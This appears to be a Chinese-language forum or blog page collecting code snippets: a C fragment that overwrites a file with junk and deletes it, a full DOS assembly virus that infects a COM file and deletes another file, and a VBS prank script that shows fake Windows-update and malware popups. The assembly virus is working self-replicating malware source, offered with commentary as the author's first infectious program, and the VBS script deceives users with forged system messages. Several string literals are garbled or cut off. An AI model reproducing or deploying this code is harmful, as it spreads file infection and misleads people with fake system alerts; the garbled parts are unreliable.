// TODO: Overwrite the Original File with Rubbish Data
if(!WriteFile( hFileDel,
RubbishData,
dwBufferLength,
&dwBytesWritten,
NULL) ) {
ErrorExit(\
return -1; }
CloseHandle(hFileDel);
// TODO: Delete the Modified File
if(!DeleteFile(pFileName)) {
ErrorExit(\
return -1; }
return 1;
间单的病毒代码
;-----------------------------------------
;功能:感染当前文件夹的test.com文件 ; 并删除当前文件夹的del.txt文件 ; 显示预设的字符串 CSEG SEGMENT
ASSUME CS:CSEG,DS:CSEG,SS:CSEG main PROC NEAR mainstart:
CALL vstart ;病毒的代码开始处 vstart:
POP SI ;得到当前地址 MOV BP,SI ;保存当前地址 PUSH SI MOV AH,9
ADD SI,OFFSET message-OFFSET vstart ;显示预设字符串 MOV DX,SI INT 21h POP SI
ADD SI,OFFSET yuan4byte-OFFSET vstart ;取得原程序中的前四个字节 MOV DI,100h ;目的地址 MOV AX,DS:[SI] ;开始复制 MOV DS:[DI],AX INC SI INC SI INC DI INC DI
MOV AX,DS:[SI] MOV DS:[DI],AX
MOV SI,BP ;恢复地址值
MOV DX,OFFSET delname-OFFSET vstart ADD DX,SI MOV AH,41h INT 21h
MOV DX,OFFSET filename-OFFSET vstart ;得到文件名 ADD DX,SI MOV AL,02
MOV AH,3dh ;写文件 INT 21h JC error
MOV BX,AX ;文件句柄
MOV DX,OFFSET yuan4byte-OFFSET vstart ;读文件的前四个字节
ADD DX,SI MOV CX,4 MOV AH,3fh INT 21h
MOV AX,4202h ;到文件尾 XOR CX,CX XOR DX,DX INT 21h
MOV DI,OFFSET new4byte-OFFSET vstart ;保存要跳的地方 ADD DI,2 ADD DI,SI SUB AX,4
MOV DS:[DI],AX
ADD SI,OFFSET mainstart-OFFSET vstart ;准备写入病毒 MOV DX,SI
MOV vsizes,OFFSET vends-OFFSET mainstart MOV CX,vsizes MOV AH,40h INT 21h
MOV SI,BP ;定位到文件头 MOV AL,0 XOR CX,CX XOR DX,DX MOV AH,42h INT 21h
MOV AH,40h ;将新的文件头写入 MOV CX,4
MOV DX,OFFSET new4byte-OFFSET vstart ADD DX,SI INT 21h
MOV AH,3eh ;关闭文件 INT 21h error:
MOV AX,100h PUSH AX RET
main ENDP yuan4byte: RET
DB 3 DUP (?) vsizes DW 0
new4byte DB ?M?,0e9h,0,0 filename DB \ delname DB \
message DB \ DB 0dh,0ah,\ vends: start:
MOV AX,CSEG MOV DS,AX MOV SS,AX CALL main MOV AX,4c00h INT 21h
CSEG ENDS END start
以上就是一个简单的可以传染COM文件的程序代码, 也是想当初我所做的具有传染性质的第一个程序。如何???不难吧。 附:
COM文件执行时将COM文件内所的所有内容COPY到内存, 起始地址是100,然后进行执行
没有任何有关节啦、段啦这些属性,所以COM文件病毒是最简单最简单的病毒。}
vbs整人代码(要可以用) 我直接COPY到记事本里,所以别打错了。
--------------------------------------------------------------------- 代码:
Set ws=WScript.CreateObject(\
ws.popup\大家好,我就是改变社会风气,风魔万千少女,刺激电影市道,提高年轻人内涵,\闪亮登场\
ws.popup\玉树临风,风度翩翩的??“咕噜?咕噜?”,不好意思,我内急先闪了,再见!\wscript.sleep 100000
ws.popup\发现重要windows更新未安装,系统将自动下载更新并安装\ws.popup\正在下载windows更新??\ wscript.sleep 10000
ws.popup\更新已下载完毕,正在安装更新??\ wscript.sleep 3000
msgbox\系统检测到WINDOWS更新中携带有不明软件 comcontroler.exe ,并在强行嵌入你的电脑\是否对其进行扫描?\